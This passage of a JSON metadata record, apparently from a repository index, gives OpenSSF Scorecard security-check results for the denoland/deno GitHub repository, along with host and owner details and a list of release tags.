d":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id"